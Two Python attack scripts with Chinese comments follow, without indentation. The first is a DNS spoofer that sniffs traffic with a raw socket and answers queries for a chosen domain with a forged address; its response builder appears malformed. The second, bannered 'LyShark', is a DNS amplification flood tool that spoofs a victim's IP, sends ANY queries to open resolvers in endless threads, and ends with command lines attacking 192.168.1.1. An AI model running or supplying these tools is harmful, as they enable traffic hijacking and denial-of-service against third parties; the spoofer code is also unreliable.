import socket
import struct
# 监听的 DNS 请求域名和 IP 地址
target_domain = 'www.example.com'
target_ip = '192.168.1.100'
def get_dns_header(data):
# 解析 DNS 请求头部,返回标志位和查询问题数
header = struct.unpack('!6H', data[:12])
flags = header[1]
qdcount = header[2]
return flags, qdcount
def build_dns_response(data):
# 构造 DNS 响应报文
transaction_id = data[:2]
flags = b'\x81\x80'
qdcount = data[4:6]
ancount = b'\x00\x01'
nscount = b'\x00\x00'
arcount = b'\x00\x00'
query = data[12:]
# 构造 DNS 响应中的资源记录
response = target_domain.encode('ascii') + b'\x00'
response += b'\x00\x01\x00\x01'
response += b'\xc0\x0c'
response += b'\x00\x01\x00\x01'
response += b'\x00\x00\x00\x32'
response += b'\x00\x04'
response += socket.inet_aton(target_ip)
# 拼接 DNS 响应报文
dns_response = transaction_id + flags + qdcount + ancount + nscount + arcount + query + response
return dns_response
def main():
# 创建一个原始套接字,监听所有的网络流量
sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_IP)
sock.bind(('0.0.0.0', 0))
sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
sock.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)
while True:
# 接收网络流量
data, addr = sock.recvfrom(65535)
# 解析 IP 头部,判断协议是否为 UDP
ip_header = data[:20]
iph = struct.unpack('!BBHHHBBH4s4s', ip_header)
protocol = iph[6]
if protocol!= 17:
continue
# 解析 UDP 头部,判断是否为 DNS 请求
udp_header = data[20:28]
udph = struct.unpack('!HHHH', udp_header)
src_port = udph[0]
dst_port = udph[1]
if dst_port!= 53:
continue
# 解析 DNS 请求头部,判断请求域名是否为目标域名
dns_header = get_dns_header(data[28:])
if dns_header[0] & 0x8000 == 0 and dns_header[1] == 1:
query = data[28+12:]
domain = query.split(b'\x00')[0].decode('ascii')
if domain == target_domain:
dns_response = build_dns_response(data[28:])
sock.sendto(dns_response, addr)
if __name__ == '__main__':
main()
import os,sys,threading,time
from scapy.all import *
import argparse
def Inspect_DNS_Usability(filename):
proxy_list = []
fp = open(filename,"r")
for i in fp.readlines():
try:
addr = i.replace("\n","")
respon = sr1(IP(dst=addr)/UDP()/DNS(rd=1,qd=DNSQR(qname="www.baidu.com")),timeout=2)
if respon!= "":
proxy_list.append(str(respon["IP"].src))
except Exception:
pass
return proxy_list
def DNS_Flood(target,dns):
# 构造 IP 数据包
ip_pack = IP()
ip_pack.src = target
ip_pack.dst = dns
# ip_pack.src = "192.168.1.2"
# ip_pack.dst = "8.8.8.8"
# 构造 UDP 数据包
udp_pack = UDP()
udp_pack.sport = 53
udp_pack.dport = 53
# 构造 DNS 数据包
dns_pack = DNS()
dns_pack.rd = 1
dns_pack.qdcount = 1
# 构造 DNSQR 解析
dnsqr_pack = DNSQR()
dnsqr_pack.qname = "baidu.com"
dnsqr_pack.qtype = 255
dnsqr_pack.qd = dnsqr_pack
respon = (ip_pack/udp_pack/dns_pack)
sr1(respon)
def Banner():
print(" _ ____ _ _ ")
print(" | | _ _/ ___|| |__ __ _ _ __| | __")
print(" | | | | | \___ \\| '_ \\ / _` | '__| |/ /")
print(" | |__| |_| |___) | | | | (_| | | | < ")
print(" |_____\\__, |____/|_| |_|\\__,_|_| |_|\\_\\")
print(" |___/ \n")
print("E-Mail: me@lyshark.com\n")
if __name__ == "__main__":
Banner()
parser = argparse.ArgumentParser()
parser.add_argument("--mode",dest="mode",help="选择执行命令<check=检查 DNS 可用性/flood=攻击>")
parser.add_argument("-f","--file",dest="file",help="指定一个 DNS 字典,里面存储 DNSIP 地址")
parser.add_argument("-t",dest="target",help="输入需要攻击的 IP 地址")
args = parser.parse_args()
if args.mode == "check" and args.file:
proxy = Inspect_DNS_Usability(args.file)
fp = open("pass.log","w+")
for item in proxy:
fp.write(item + "\n")
fp.close()
print("[+] DNS 地址检查完毕,当前可用 DNS 保存为 pass.log")
elif args.mode == "flood" and args.target and args.file:
with open(args.file,"r") as fp:
countent = [line.rstrip("\n") for line in fp]
while True:
randomDNS = str(random.sample(countent,1)[0])
print("[+] 目标主机: {} -----> 随机 DNS: {}".format(args.target,randomDNS))
t = threading.Thread(target=DNS_Flood,args=(args.target,randomDNS,))
t.start()
else:
parser.print_help()
main.py --mode=check -f dns.txt
main.py --mode=flood -f pass.log -t 192.168.1.1
-->